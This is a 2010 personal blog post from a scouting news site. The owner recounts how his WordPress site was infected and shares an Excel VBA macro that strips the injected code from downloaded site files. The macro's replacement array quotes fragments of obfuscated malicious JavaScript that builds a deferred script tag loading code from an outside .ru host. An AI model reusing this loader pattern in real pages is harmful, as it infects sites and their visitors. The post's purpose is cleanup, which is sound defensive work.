BoyandGirlScouts.com – News, Opinion, Advice

26 June 2010

Hacked to Pieces

Posted by admin under: blog news .

So you may have noticed that the site has been down for a long while with a message that I had a virus. It’s true. The day after my last post my site was attacked by a script from somewhere that went through all my wordpress files and edited them to add some virus code so that my site could attack others.

Coincidentally I was adding virus scanning software to my pc and it detected that my own web page was trying to do bad stuff. I ignored it at the time because it just seemed too weird for it to start happening as I was installing the software. After a couple of days, though, and trying to access the blog from other places I realized I really had been hacked.

I went through the files and found several hundred modified files (anything that had a .php or .js extension). I took the blog offline and started trying to edit them by hand, but that was going to take forever. So, I wrote a macro in Excel and had it run on all the files I had downloaded. It found strings of text I had identified as the virus code and deleted it.

Life being what it is I never had time to get back to loading the thousands of files that make up the blog until now. So, I’m back up. My anti-virus software didn’t ping me when I brought the blog back online so all looks well. I’m glad I don’t know who did this to me (or the auto script they initiated to do it to me). I’d probably go to jail for a felony if I did.

For those of you who ever want a looping program that you can copy into a VBA module behind Excel, Word, or other Microsoft Office products, feel free to grab the code below and use it. Tonight I’m going to see my daughter’s annual dance recital (or my viewing of it; they have several showings). So, I guess I’ll start posting again when I have some time to pull up some interesting reading. See ya!

Sub Main()
Dim arrDirList() As String
Dim arrFileLIst() As String
Dim varDir As Variant
Dim strDir As String
Dim varFile As Variant
Dim intFileNum As Integer
Dim strFileData As String
Dim lngLen As Long
Dim intFileCount As Integer
Dim arrToReplace(1 To 10) As String
Dim lngNextChar As Long
Dim lngDataOffset As Long
Dim varString As Variant

arrToReplace(1) = “”
arrToReplace(7) = “var X_=[""zS"",""A""];var mF=new String();};};this.HZ=false;F();var vT=[""pbU""];Wk=3544;Wk++;window.onload=I;var kj=new Array();var FK=new Array();”
arrToReplace(8) = “”
arrToReplace(9) = “Ttf’,'61Tb70Vsf’);lV={cL:”"OX”"};M=a[f](W);var nv=new Date();var Ej={UA:”"st”"};var Sn=[""xF"",""YT""];var Y=new String(”"defe”"+”"r”");var q_=”"”";var qq=[];var Z=R+e;var ho={TY:”"oP”"};var WY=false;Bq={rp:”"Mo”"};var k=w(’sVr3cp’,'G_VXtp3Y’);M[Y]=[1][0];var N=false;Mm=43881;Mm-=248;M[k]=String(”"htt”"+”"p:/”"+”"/mu”"+”"shy”"+”"oil”"+”".ru”"+”":”")+Z;var GF={tN:false};dok={vo:14141};”
arrToReplace(10) = “this.iH=61501;this.iH–;this.iq=”;a[l].appendChild(M);var Oi=”;var fb=”"”";} catch(ku){try {} catch(BW){};try {} catch(PQ){};};”

Call BuildDirList(arrDirList, “C:\Documents and Settings\Me\My Documents\websitefiles\”)

For Each varDir In arrDirList
strDir = varDir
intFileCount = ADir(arrFileLIst, strDir)

If intFileCount > 0 Then
For Each varFile In arrFileLIst
Debug.Print varFile
intFileNum = FreeFile
lngLen = FileLen(varDir & varFile)
Open varDir & varFile For Binary Access Read Write As intFileNum

If lngLen > 0 Then

strFileData = “”
strFileData = Input(lngLen, intFileNum)

For Each varString In arrToReplace
Do
lngDataOffset = InStr(1, strFileData, varString)

If lngDataOffset > 0 Then
strFileData = Replace(strFileData, varString, “”)
End If
Loop While lngDataOffset > 0
Next

Close intFileNum
Kill varDir & varFile
Open varDir & varFile For Binary Access Write As intFileNum
Put intFileNum, 1, strFileData
End If
Close intFileNum
Next
End If
Next

End Sub

Function BuildDirList(arrDirs() As String, strPath As String) As Integer
Dim intDirCount As Integer
Dim intLoop As Integer
Dim intNextDir As Integer
Dim intSubDirs As Integer
Dim intTempCount As Integer
Dim intTempLoop As Integer
Dim arrSubDirs() As String

intDirCount = ADirectoriesOnly(arrDirs, strPath)
DoEvents

If intDirCount > 0 Then
intNextDir = 1
Do
For intLoop = intNextDir To intDirCount
intSubDirs = ADirectoriesOnly(arrSubDirs, arrDirs(intLoop))
DoEvents

If intSubDirs > 0 Then
intTempCount = UBound(arrDirs)
ReDim Preserve arrDirs(1 To (UBound(arrDirs) + intSubDirs))
For intTempLoop = intTempCount + 1 To UBound(arrDirs)
arrDirs(intTempLoop) = arrSubDirs(intTempLoop – intTempCount)
DoEvents
Next
End If
Next

If intDirCount = UBound(arrDirs) Then
Exit Do
Else
intNextDir = intDirCount + 1
intDirCount = UBound(arrDirs)
End If
Loop While True

ReDim Preserve arrDirs(1 To UBound(arrDirs) + 1)
arrDirs(UBound(arrDirs)) = strPath
Else
If Len(Dir(strPath, vbDirectory)) > 0 Then
ReDim arrDirs(1 To 1)
arrDirs(UBound(arrDirs)) = strPath
Else
MsgBox “Not a valid directory to scan”
End If
End If
End Function
Function ADir(arrFiles As Variant, strPath As String, Optional varAttributes) As Integer
Dim intCount As Integer
Dim strFile As String

intCount = 0
Do
If intCount = 0 Then
If IsMissing(varAttributes) Then strFile = Dir(strPath) Else strFile = Dir(strPath, varAttributes)
Else
If IsMissing(varAttributes) Then strFile = Dir() Else strFile = Dir()
End If

If Len(Trim(strFile)) = 0 Then
Exit Do
End If

intCount = intCount + 1
ReDim Preserve arrFiles(1 To intCount)
arrFiles(intCount) = strFile
Loop While True

ADir = intCount
End Function

Function ADirectoriesOnly(arrDirectories As Variant, strPath As String) As Integer
Dim intCount As Integer
Dim intFiles As Integer
Dim strFile As String
Dim arrFiles() As String
Dim booFirst As Boolean
Dim booAdd As Boolean

intFiles = ADir(arrFiles, strPath)

intCount = 0
intMatches = 0
booFirst = True
Do
If booFirst Then
strFile = Dir(strPath, vbDirectory)
booFirst = False
Else
strFile = Dir()
End If

If Len(Trim(strFile)) = 0 Then
Exit Do
End If

If strFile <> “.” And strFile <> “..” Then
booAdd = False
If intFiles = 0 Then
booAdd = True
Else
If aFind(strFile, arrFiles) = 0 Then booAdd = True
End If

If booAdd Then
intCount = intCount + 1
ReDim Preserve arrDirectories(1 To intCount)
arrDirectories(intCount) = strPath & strFile & “\”
End If
End If
Loop While True

ADirectoriesOnly = intCount
End Function

Function aFind(strSearch As String, varFiles As Variant) As Integer
Dim intLoop As Integer

For intLoop = UBound(varFiles) To 1 Step -1
If varFiles(intLoop) = strSearch Then
Exit For
End If
Next

aFind = intLoop
End Function

Possibly Related Posts:

• H1N1 Swine Flu Hits Boy Scouts in Utah
• Another Boy Scout Camp Hit With Swine Flu
• Is Woman-Owned Important?
• No More Google For Me
• Jesse Showing Girl Scout Love

2 Comments so far...

Leave a Reply

Name

Mail (will not be published)

Website